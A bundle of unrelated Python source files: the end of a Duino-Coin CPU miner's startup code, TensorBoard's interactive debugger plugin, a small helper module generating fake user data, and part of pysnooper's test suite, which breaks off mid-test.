debug_output("Error launching Discord RPC thread: " + str(e))
sleep(15) # 15 seconds to respect Discord rate limit
def get_fastest_connection(server_ip: str):
connection_pool = []
available_connections = []
for i in range(len(AVAILABLE_PORTS)):
connection_pool.append(socket())
connection_pool[i].setblocking(0)
try:
connection_pool[i].connect((server_ip,
AVAILABLE_PORTS[i]))
connection_pool[i].settimeout(SOC_TIMEOUT)
except BlockingIOError as e:
pass
ready_connections, _, __ = select.select(connection_pool, [], [])
while True:
for connection in ready_connections:
try:
server_version = connection.recv(5).decode()
except:
continue
if server_version == b'':
continue
available_connections.append(connection)
connection.send(b'PING')
ready_connections, _, __ = select.select(available_connections, [], [])
ready_connections[0].recv(4)
return ready_connections[0].getpeername()[1]
def fetch_pools():
while True:
pretty_print("net0",
" "
+ getString("connection_search")
+ "...",
"warning")
try:
response = requests.get(
"https://server.duinocoin.com/getPool"
).json()
pretty_print("net0",
" Retrieved mining node: "
+ Fore.RESET
+ Style.NORMAL
+ str(response["name"]),
"success")
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return NODE_ADDRESS, NODE_PORT
except Exception as e:
pretty_print("net0",
" Error retrieving mining node: "
+ str(e)
+ ", retrying in 15s",
"error")
sleep(15)
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
cpu = cpuinfo.get_cpu_info()
title(getString("duco_python_miner") + str(MINER_VER) + ")")
if osname == "nt":
# Unicode fix for windows
ossystem("chcp 65001")
# Colorama
init(autoreset=True)
try:
from multiprocessing import (
Manager,
Process,
Value,
cpu_count,
current_process
)
manager = Manager()
# Multiprocessing globals
khashcount = Value("i", 0)
accepted = Value("i", 0)
rejected = Value("i", 0)
hashrates_list = manager.dict()
totalhashrate_mean = manager.list()
except Exception as e:
print(e)
pretty_print(
"sys0",
" Multiprocessing is not available. "
+ "Please check permissions and/or your python installation. "
+ "Exiting in 10s.",
"error")
sleep(10)
_exit(1)
try:
# Load config file or create new one
loadConfig()
debug_output("Config file loaded")
except Exception as e:
pretty_print(
"sys0",
getString("load_config_error")
+ RESOURCES_DIR
+ getString("load_config_error_warning")
+ Style.NORMAL
+ Fore.RESET
+ " (config load err: "
+ str(e)
+ ")",
"error")
debug_output("Error reading configfile: " + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
Greeting()
debug_output("Greeting displayed")
except Exception as e:
pretty_print(
"sys0",
"Error displaying greeting message"
+ Style.NORMAL
+ Fore.RESET
+ " (greeting err: "
+ str(e)
+ ")",
"error")
debug_output("Error displaying greeting message: " + str(e))
try:
NODE_ADDRESS, NODE_PORT = fetch_pools()
except:
NODE_ADDRESS = "server.duinocoin.com"
NODE_PORT = 2813
debug_output("Using default server port and address")
try:
for x in range(int(threadcount)):
# Launch duco mining threads
thread.append(x)
thread[x] = Process(
target=Thread,
args=(
x,
accepted,
rejected,
requested_diff,
khashcount,
username,
efficiency,
rig_identiier,
algorithm,
hashrates_list,
totalhashrate_mean,
NODE_ADDRESS,
NODE_PORT))
thread[x].start()
if x > 4 and x % 4 == 0:
# Don't launch burst of threads
# to not get banned
sleep(5)
else:
sleep(0.1)
except Exception as e:
pretty_print(
"sys0",
"Error launching CPU thread(s)"
+ Style.NORMAL
+ Fore.RESET
+ " (cpu launch err: "
+ str(e)
+ ")",
"error")
debug_output("Error launching CPU thead(s): " + str(e))
if discord_presence == "y":
try:
# Discord rich presence threads
initRichPresence()
thrThread(
target=updateRichPresence).start()
except Exception as e:
debug_output("Error launching Discord RPC thead: " + str(e))
|
interactive_debugger_plugin.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The plugin for the interactive Debugger Dashboard."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import platform
import signal
import sys
import threading
from six.moves import xrange # pylint:disable=redefined-builtin
import tensorflow as tf
from werkzeug import wrappers
from tensorboard.backend import http_util
from tensorboard.plugins import base_plugin
from tensorboard.plugins.debugger import constants
from tensorboard.plugins.debugger import interactive_debugger_server_lib
from tensorboard.util import tb_logging
logger = tb_logging.get_logger()
# HTTP routes.
_ACK_ROUTE = '/ack'
_COMM_ROUTE = '/comm'
_DEBUGGER_GRAPH_ROUTE = '/debugger_graph'
_DEBUGGER_GRPC_HOST_PORT_ROUTE = '/debugger_grpc_host_port'
_GATED_GRPC_ROUTE = '/gated_grpc'
_TENSOR_DATA_ROUTE = '/tensor_data'
_SOURCE_CODE_ROUTE = '/source_code'
class InteractiveDebuggerPlugin(base_plugin.TBPlugin):
"""Interactive TensorFlow Debugger plugin.
This underlies the interactive Debugger Dashboard.
This is different from the non-interactive `DebuggerPlugin` in module
`debugger_plugin`. The latter is for the "health pills" feature in the Graph
Dashboard.
"""
# This string field is used by TensorBoard to generate the paths for routes
# provided by this plugin. It must thus be URL-friendly. This field is also
# used to uniquely identify this plugin throughout TensorBoard. See BasePlugin
# for details.
plugin_name = constants.DEBUGGER_PLUGIN_NAME
def __init__(self, context):
"""Constructs a debugger plugin for TensorBoard.
This plugin adds handlers for retrieving debugger-related data. The plugin
also starts a debugger data server once the log directory is passed to the
plugin via the call to get_plugin_apps.
Args:
context: A base_plugin.TBContext instance.
"""
del context # Unused.
self._debugger_data_server = None
self._server_thread = None
self._grpc_port = None
def listen(self, grpc_port):
"""Start listening on the given gRPC port.
This method of an instance of InteractiveDebuggerPlugin can be invoked at
most once. This method is not thread safe.
Args:
grpc_port: port number to listen at.
Raises:
ValueError: If this instance is already listening at a gRPC port.
"""
if self._grpc_port:
raise ValueError(
'This InteractiveDebuggerPlugin instance is already listening at '
'gRPC port %d' % self._grpc_port)
self._grpc_port = grpc_port
sys.stderr.write('Creating InteractiveDebuggerPlugin at port %d\n' %
self._grpc_port)
sys.stderr.flush()
self._debugger_data_server = (
interactive_debugger_server_lib.InteractiveDebuggerDataServer(
self._grpc_port))
self._server_thread = threading.Thread(
target=self._debugger_data_server.run_server)
self._server_thread.start()
signal.signal(signal.SIGINT, self.signal_handler)
# Note: this is required because of a wontfix issue in grpc/python 2.7:
# https://github.com/grpc/grpc/issues/3820
def signal_handler(self, unused_signal, unused_frame):
if self._debugger_data_server and self._server_thread:
print('Stopping InteractiveDebuggerPlugin...')
# Enqueue a number of messages to the incoming message queue to try to
# let the debugged tensorflow runtime proceed past the current Session.run
# in the C++ layer and return to the Python layer, so the SIGINT handler
# registered there may be triggered.
for _ in xrange(len(self._debugger_data_server.breakpoints) + 1):
self._debugger_data_server.put_incoming_message(True)
try:
self._debugger_data_server.stop_server()
except ValueError:
# In case the server has already stopped running.
pass
self._server_thread.join()
print('InteractiveDebuggerPlugin stopped.')
sys.exit(0)
def get_plugin_apps(self):
"""Obtains a mapping between routes and handlers.
This function also starts a debugger data server on separate thread if the
plugin has not started one yet.
Returns:
A mapping between routes and handlers (functions that respond to
requests).
"""
return {
_ACK_ROUTE: self._serve_ack,
_COMM_ROUTE: self._serve_comm,
_DEBUGGER_GRPC_HOST_PORT_ROUTE: self._serve_debugger_grpc_host_port,
_DEBUGGER_GRAPH_ROUTE: self._serve_debugger_graph,
_GATED_GRPC_ROUTE: self._serve_gated_grpc,
_TENSOR_DATA_ROUTE: self._serve_tensor_data,
_SOURCE_CODE_ROUTE: self._serve_source_code,
}
def is_active(self):
"""Determines whether this plugin is active.
This plugin is active if any health pills information is present for any
run.
Returns:
A boolean. Whether this plugin is active.
"""
return self._grpc_port is not None
def frontend_metadata(self):
# TODO(#2338): Keep this in sync with the `registerDashboard` call
# on the frontend until that call is removed.
return base_plugin.FrontendMetadata(element_name='tf-debugger-dashboard')
@wrappers.Request.application
def _serve_ack(self, request):
# Send client acknowledgement. `True` is just used as a dummy value.
self._debugger_data_server.put_incoming_message(True)
return http_util.Respond(request, {}, 'application/json')
@wrappers.Request.application
def _serve_comm(self, request):
# comm_channel.get() blocks until an item is put into the queue (by
# self._debugger_data_server). This is how the HTTP long polling ends.
pos = int(request.args.get("pos"))
comm_data = self._debugger_data_server.get_outgoing_message(pos)
return http_util.Respond(request, comm_data, 'application/json')
@wrappers.Request.application
def _serve_debugger_graph(self, request):
device_name = request.args.get('device_name')
if not device_name or device_name == 'null':
return http_util.Respond(request, str(None), 'text/x-protobuf')
run_key = interactive_debugger_server_lib.RunKey(
*json.loads(request.args.get('run_key')))
graph_def = self._debugger_data_server.get_graph(run_key, device_name)
logger.debug(
'_serve_debugger_graph(): device_name = %s, run_key = %s, '
'type(graph_def) = %s', device_name, run_key, type(graph_def))
# TODO(cais): Sending text proto may be slow in Python. Investigate whether
# there are ways to optimize it.
return http_util.Respond(request, str(graph_def), 'text/x-protobuf')
def _error_response(self, request, error_msg):
logger.error(error_msg)
return http_util.Respond(
request, {'error': error_msg}, 'application/json', 400)
@wrappers.Request.application
def _serve_gated_grpc(self, request):
mode = request.args.get('mode')
if mode == 'retrieve_all' or mode == 'retrieve_device_names':
# 'retrieve_all': Retrieve all gated-gRPC debug tensors and currently
# enabled breakpoints associated with the given run_key.
# 'retrieve_device_names': Retrieve all device names associated with the
# given run key.
run_key = interactive_debugger_server_lib.RunKey(
*json.loads(request.args.get('run_key')))
# debug_graph_defs is a map from device_name to GraphDef.
debug_graph_defs = self._debugger_data_server.get_graphs(run_key,
debug=True)
if mode == 'retrieve_device_names':
return http_util.Respond(request, {
'device_names': list(debug_graph_defs.keys()),
}, 'application/json')
gated = {}
for device_name in debug_graph_defs:
gated[device_name] = self._debugger_data_server.get_gated_grpc_tensors(
run_key, device_name)
# Both gated and self._debugger_data_server.breakpoints are lists whose
# items are (node_name, output_slot, debug_op_name).
return http_util.Respond(request, {
'gated_grpc_tensors': gated,
'breakpoints': self._debugger_data_server.breakpoints,
'device_names': list(debug_graph_defs.keys()),
}, 'application/json')
elif mode == 'breakpoints':
# Retrieve currently enabled breakpoints.
return http_util.Respond(
request, self._debugger_data_server.breakpoints, 'application/json')
elif mode == 'set_state':
# Set the state of gated-gRPC debug tensors, e.g., disable, enable
# breakpoint.
node_name = request.args.get('node_name')
output_slot = int(request.args.get('output_slot'))
debug_op = request.args.get('debug_op')
state = request.args.get('state')
logger.debug('Setting state of %s:%d:%s to: %s' %
(node_name, output_slot, debug_op, state))
if state == 'disable':
self._debugger_data_server.request_unwatch(
node_name, output_slot, debug_op)
elif state == 'watch':
self._debugger_data_server.request_watch(
node_name, output_slot, debug_op, breakpoint=False)
elif state == 'break':
self._debugger_data_server.request_watch(
node_name, output_slot, debug_op, breakpoint=True)
else:
return self._error_response(
request, 'Unrecognized new state for %s:%d:%s: %s' % (node_name,
output_slot,
debug_op,
state))
return http_util.Respond(
request,
{'node_name': node_name,
'output_slot': output_slot,
'debug_op': debug_op,
'state': state},
'application/json')
else:
return self._error_response(
request, 'Unrecognized mode for the gated_grpc route: %s' % mode)
@wrappers.Request.application
def _serve_debugger_grpc_host_port(self, request):
return http_util.Respond(
request,
{'host': platform.node(), 'port': self._grpc_port}, 'application/json')
@wrappers.Request.application
def _serve_tensor_data(self, request):
response_encoding = 'application/json'
watch_key = request.args.get('watch_key')
time_indices = request.args.get('time_indices')
mapping = request.args.get('mapping')
slicing = request.args.get('slicing')
try:
sliced_tensor_data = self._debugger_data_server.query_tensor_store(
watch_key, time_indices=time_indices, slicing=slicing,
mapping=mapping)
response = {
'tensor_data': sliced_tensor_data,
'error': None
}
status_code = 200
except (IndexError, ValueError) as e:
response = {
'tensor_data': None,
'error': {
'type': type(e).__name__,
},
}
# TODO(cais): Provide safe and succinct error messages for common error
# conditions, such as index out of bound, or invalid mapping for given
# tensor ranks.
status_code = 500
return http_util.Respond(request, response, response_encoding, status_code)
@wrappers.Request.application
def _serve_source_code(self, request):
response_encoding = 'application/json'
mode = request.args.get('mode')
if mode == 'paths':
# Retrieve all file paths.
response = {'paths': self._debugger_data_server.query_source_file_paths()}
return http_util.Respond(request, response, response_encoding)
elif mode == 'content':
# Retrieve the content of a source file.
file_path = request.args.get('file_path')
response = {
'content': {
file_path: self._debugger_data_server.query_source_file_content(
file_path)},
'lineno_to_op_name_and_stack_pos':
self._debugger_data_server.query_file_tracebacks(file_path)}
return http_util.Respond(request, response, response_encoding)
elif mode == 'op_traceback':
# Retrieve the traceback of a graph op by name of the op.
op_name = request.args.get('op_name')
response = {
'op_traceback': {
op_name: self._debugger_data_server.query_op_traceback(op_name)
}
}
return http_util.Respond(request, response, response_encoding)
else:
response = {'error': 'Invalid mode for source_code endpoint: %s' % mode}
return http_util.Response(request, response, response_encoding, 500)
|
helpers.py
|
# -*- coding: utf-8 -*-
"""
Random user endpoint.
Using Mimesis example for this: https://bit.ly/37KUAlo
"""
import emoji
from mimesis import Generic
from mimesis.enums import Gender
from mimesis.schema import Field, Schema
import pytube
from google.cloud import storage
import os
import random
import string
import json
import urllib.request
from script import *
from util import *
import multiprocessing
import uuid
_ = Field("en")
random_users = Schema(
lambda: {
"id": _("uuid"),
"name": _("name", gender=Gender.MALE),
"surname": _("surname", gender=Gender.MALE),
"email": _("email"),
"age": _("age"),
"username": _("username", template="UU_d"),
"occupation": _("occupation"),
"address": {
"street": _("street_name"),
"city": _("city"),
"zipcode": _("zip_code"),
},
},
)
g = Generic("en") # Going to stick with American English.
def passwd(length: int = 8, hash: bool = False) -> str:
"""
Helper function to generate a random password.
"""
return g.person.password(length=length, hashed=hash)
def emojis() -> str:
"""
Helper function to create random a emoji.
"""
return emoji.emojize(g.internet.emoji(), use_aliases=True)
def vid_maker(vid_id, start_time, end_time, user_id):
work_id = str(uuid.uuid4())
print('work id is: ', work_id)
multiprocessing.Process(target=main_func, args=(vid_id, start_time, end_time, user_id, str(work_id))).start()
return {
'work_id': work_id
}
def vid_status_checker(work_id):
result = check_gsheet_db(work_id)
return {
'status': result['status'],
'file_url': result['file_url']
}
|
test_pysnooper.py
|
# Copyright 2019 Ram Rachum and collaborators.
# This program is distributed under the MIT license.
import io
import textwrap
import threading
import types
import os
import sys
from pysnooper.utils import truncate
import pytest
import pysnooper
from pysnooper.variables import needs_parentheses
from .utils import (assert_output, assert_sample_output, VariableEntry,
CallEntry, LineEntry, ReturnEntry, OpcodeEntry,
ReturnValueEntry, ExceptionEntry, SourcePathEntry)
from . import mini_toolbox
def test_string_io():
string_io = io.StringIO()
@pysnooper.snoop(string_io)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_thread_info():
@pysnooper.snoop(thread_info=True)
def my_function(foo):
x = 7
y = 8
return y + x
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function('baba')
assert result == 15
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_multi_thread_info():
@pysnooper.snoop(thread_info=True)
def my_function(foo):
x = 7
y = 8
return y + x
def parse_call_content(line):
return line.split('{event:9} '.format(event='call'))[-1]
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
my_function('baba')
t1 = threading.Thread(target=my_function, name="test123",args=['bubu'])
t1.start()
t1.join()
t1 = threading.Thread(target=my_function, name="bibi",args=['bibi'])
t1.start()
t1.join()
output = output_capturer.string_io.getvalue()
calls = [line for line in output.split("\n") if "call" in line]
main_thread = calls[0]
assert parse_call_content(main_thread) == parse_call_content(calls[1])
assert parse_call_content(main_thread) == parse_call_content(calls[2])
thread_info_regex = '([0-9]+-{name}+[ ]+)'
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
LineEntry('x = 7',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
VariableEntry('x', '7'),
LineEntry('y = 8',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
VariableEntry('y', '8'),
LineEntry('return y + x',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
VariableEntry('foo', value_regex="u?'bubu'"),
CallEntry('def my_function(foo):',
thread_info_regex=thread_info_regex.format(
name="test123")),
LineEntry('x = 7',
thread_info_regex=thread_info_regex.format(
name="test123")),
VariableEntry('x', '7'),
LineEntry('y = 8',
thread_info_regex=thread_info_regex.format(
name="test123")),
VariableEntry('y', '8'),
LineEntry('return y + x',
thread_info_regex=thread_info_regex.format(
name="test123")),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
VariableEntry('foo', value_regex="u?'bibi'"),
CallEntry('def my_function(foo):',
thread_info_regex=thread_info_regex.format(name='bibi')),
LineEntry('x = 7',
thread_info_regex=thread_info_regex.format(name='bibi')),
VariableEntry('x', '7'),
LineEntry('y = 8',
thread_info_regex=thread_info_regex.format(name='bibi')),
VariableEntry('y', '8'),
LineEntry('return y + x',
thread_info_regex=thread_info_regex.format(name='bibi')),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
@pytest.mark.parametrize("normalize", (True, False))
def test_callable(normalize):
string_io = io.StringIO()
def write(msg):
string_io.write(msg)
@pysnooper.snoop(write, normalize=normalize)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_watch(normalize):
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@pysnooper.snoop(watch=(
'foo.x',
'io.__name__',
'len(foo.__dict__["x"] * "abc")',
), normalize=normalize)
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Foo'),
VariableEntry('io.__name__', "'io'"),
CallEntry('def my_function():'),
LineEntry('foo = Foo()'),
VariableEntry('foo'),
VariableEntry('foo.x', '2'),
VariableEntry('len(foo.__dict__["x"] * "abc")', '6'),
LineEntry(),
VariableEntry('i', '0'),
LineEntry(),
VariableEntry('foo.x', '4'),
VariableEntry('len(foo.__dict__["x"] * "abc")', '12'),
LineEntry(),
VariableEntry('i', '1'),
LineEntry(),
VariableEntry('foo.x', '16'),
VariableEntry('len(foo.__dict__["x"] * "abc")', '48'),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('None')
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_watch_explode(normalize):
class Foo:
def __init__(self, x, y):
self.x = x
self.y = y
@pysnooper.snoop(watch_explode=('_d', '_point', 'lst + []'), normalize=normalize)
def my_function():
_d = {'a': 1, 'b': 2, 'c': 'ignore'}
_point = Foo(x=3, y=4)
lst = [7, 8, 9]
lst.append(10)
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Foo'),
CallEntry('def my_function():'),
LineEntry(),
VariableEntry('_d'),
VariableEntry("_d['a']", '1'),
VariableEntry("_d['b']", '2'),
VariableEntry("_d['c']", "'ignore'"),
LineEntry(),
VariableEntry('_point'),
VariableEntry('_point.x', '3'),
VariableEntry('_point.y', '4'),
LineEntry(),
VariableEntry('lst'),
VariableEntry('(lst + [])[0]', '7'),
VariableEntry('(lst + [])[1]', '8'),
VariableEntry('(lst + [])[2]', '9'),
VariableEntry('lst + []'),
LineEntry(),
VariableEntry('lst'),
VariableEntry('(lst + [])[3]', '10'),
VariableEntry('lst + []'),
ReturnEntry(),
ReturnValueEntry('None')
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_variables_classes(normalize):
class WithSlots(object):
__slots__ = ('x', 'y')
def __init__(self):
self.x = 3
self.y = 4
@pysnooper.snoop(watch=(
pysnooper.Keys('_d', exclude='c'),
pysnooper.Attrs('_d'), # doesn't have attributes
pysnooper.Attrs('_s'),
pysnooper.Indices('_lst')[-3:],
), normalize=normalize)
def my_function():
_d = {'a': 1, 'b': 2, 'c': 'ignore'}
_s = WithSlots()
_lst = list(range(1000))
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('WithSlots'),
CallEntry('def my_function():'),
LineEntry(),
VariableEntry('_d'),
VariableEntry("_d['a']", '1'),
VariableEntry("_d['b']", '2'),
LineEntry(),
VariableEntry('_s'),
VariableEntry('_s.x', '3'),
VariableEntry('_s.y', '4'),
LineEntry(),
VariableEntry('_lst'),
VariableEntry('_lst[997]', '997'),
VariableEntry('_lst[998]', '998'),
VariableEntry('_lst[999]', '999'),
ReturnEntry(),
ReturnValueEntry('None')
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_single_watch_no_comma(normalize):
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@pysnooper.snoop(watch='foo', normalize=normalize)
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Foo'),
CallEntry('def my_function():'),
LineEntry('foo = Foo()'),
VariableEntry('foo'),
LineEntry(),
VariableEntry('i', '0'),
LineEntry(),
LineEntry(),
VariableEntry('i', '1'),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('None')
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_long_variable(normalize):
@pysnooper.snoop(normalize=normalize)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r'^(?=.{100}$)\[0, 1, 2, .*\.\.\..*, 997, 998, 999\]$'
assert_output(
output,
(
SourcePathEntry(),
CallEntry('def my_function():'),
LineEntry('foo = list(range(1000))'),
VariableEntry('foo', value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex)
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_long_variable_with_custom_max_variable_length(normalize):
@pysnooper.snoop(max_variable_length=200, normalize=normalize)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r'^(?=.{200}$)\[0, 1, 2, .*\.\.\..*, 997, 998, 999\]$'
assert_output(
output,
(
SourcePathEntry(),
CallEntry('def my_function():'),
LineEntry('foo = list(range(1000))'),
VariableEntry('foo', value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex)
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_long_variable_with_infinite_max_variable_length(normalize):
@pysnooper.snoop(max_variable_length=None, normalize=normalize)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r'^(?=.{1000,100000}$)\[0, 1, 2, [^.]+ 997, 998, 999\]$'
assert_output(
output,
(
SourcePathEntry(),
CallEntry('def my_function():'),
LineEntry('foo = list(range(1000))'),
VariableEntry('foo', value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex)
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_repr_exception(normalize):
class Bad(object):
def __repr__(self):
1 / 0
@pysnooper.snoop(normalize=normalize)
def my_function():
bad = Bad()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Bad'),
CallEntry('def my_function():'),
LineEntry('bad = Bad()'),
VariableEntry('bad', value='REPR FAILED'),
ReturnEntry(),
ReturnValueEntry('None')
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_depth(normalize):
string_io = io.StringIO()
def f4(x4):
result4 = x4 * 2
return result4
def f3(x3):
result3 = f4(x3)
return result3
def f2(x2):
result2 = f3(x2)
return result2
@pysnooper.snoop(string_io, depth=3, normalize=normalize)
def f1(x1):
result1 = f2(x1)
return result1
result = f1(10)
assert result == 20
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f1(x1):'),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f2(x2):'),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f3(x3):'),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_method_and_prefix(normalize):
class Baz(object):
def __init__(self):
self.x = 2
@pysnooper.snoop(watch=('self.x',), prefix='ZZZ', normalize=normalize)
def square(self):
foo = 7
self.x **= 2
return self
baz = Baz()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = baz.square()
assert result is baz
assert result.x == 4
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(prefix='ZZZ'),
VariableEntry('self', prefix='ZZZ'),
VariableEntry('self.x', '2', prefix='ZZZ'),
CallEntry('def square(self):', prefix='ZZZ'),
LineEntry('foo = 7', prefix='ZZZ'),
VariableEntry('foo', '7', prefix='ZZZ'),
LineEntry('self.x **= 2', prefix='ZZZ'),
VariableEntry('self.x', '4', prefix='ZZZ'),
LineEntry(prefix='ZZZ'),
ReturnEntry(prefix='ZZZ'),
ReturnValueEntry(prefix='ZZZ'),
),
prefix='ZZZ',
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_file_output(normalize):
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
path = folder / 'foo.log'
@pysnooper.snoop(path, normalize=normalize)
def my_function(_foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('_foo', value_regex="u?'baba'"),
CallEntry('def my_function(_foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_confusing_decorator_lines(normalize):
string_io = io.StringIO()
def empty_decorator(function):
return function
@empty_decorator
@pysnooper.snoop(string_io, normalize=normalize,
depth=2) # Multi-line decorator for extra confusion!
@empty_decorator
@empty_decorator
def my_function(foo):
x = lambda bar: 7
y = 8
return y + x(foo)
result = my_function('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry(),
LineEntry(),
# inside lambda
VariableEntry('bar', value_regex="u?'baba'"),
CallEntry('x = lambda bar: 7'),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('7'),
# back in my_function
ReturnEntry(),
ReturnValueEntry('15'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_lambda(normalize):
string_io = io.StringIO()
my_function = pysnooper.snoop(string_io, normalize=normalize)(lambda x: x ** 2)
result = my_function(7)
assert result == 49
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x', '7'),
CallEntry(source_regex='^my_function = pysnooper.*'),
LineEntry(source_regex='^my_function = pysnooper.*'),
ReturnEntry(source_regex='^my_function = pysnooper.*'),
ReturnValueEntry('49'),
),
normalize=normalize,
)
def test_unavailable_source():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder, \
mini_toolbox.TempSysPathAdder(str(folder)):
module_name = 'iaerojajsijf'
python_file_path = folder / ('%s.py' % (module_name,))
content = textwrap.dedent(u'''
import pysnooper
@pysnooper.snoop()
def f(x):
return x
''')
with python_file_path.open('w') as python_file:
python_file.write(content)
module = __import__(module_name)
python_file_path.unlink()
with mini_toolbox.OutputCapturer(stdout=False,
